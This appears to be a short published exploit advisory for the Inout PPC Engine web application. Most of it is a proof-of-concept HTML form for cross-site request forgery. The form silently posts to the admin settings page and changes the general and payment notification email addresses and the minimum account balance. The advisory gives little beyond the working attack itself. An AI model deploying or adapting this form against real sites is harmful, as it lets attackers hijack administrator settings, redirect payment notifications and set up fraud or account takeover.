Inout PPC Engine suffers from a cross site request forgery vulnerability.
90f4689b231b1d5b6ba910b66501e0fec7e9f15000c0b9dade252c465f04136c
# Exploit Title: Inout PPC Engine XSRF (change e-mail address)
# Author: Jonturk75
# Category:: webapps
# Vendor of Software Link: http://www.inoutscripts.com/products/inout_ppc_engine/
# Demo site: http://www.inoutdemo.com/inout_ppc_engine/admin/
--------------------------
<form name="form1" method="post" action="ppc-setting-action.php" onSubmit="return check_value()">
<input type="text" value="mail@mail.com" size="30" id="admin_general_notification_email" name="admin_general_notification_email"/></td>
<input type="text" value="mail@mail.com" size="30" id="admin_payment_notification_email" name="admin_payment_notification_email"/></td>
<input type="text" value="20" size="5" id="minimum_acc_balance" name="minimum_acc_balance"/> Kc</td>
<input type="submit" value="Update !" name="Submit"/>
</form>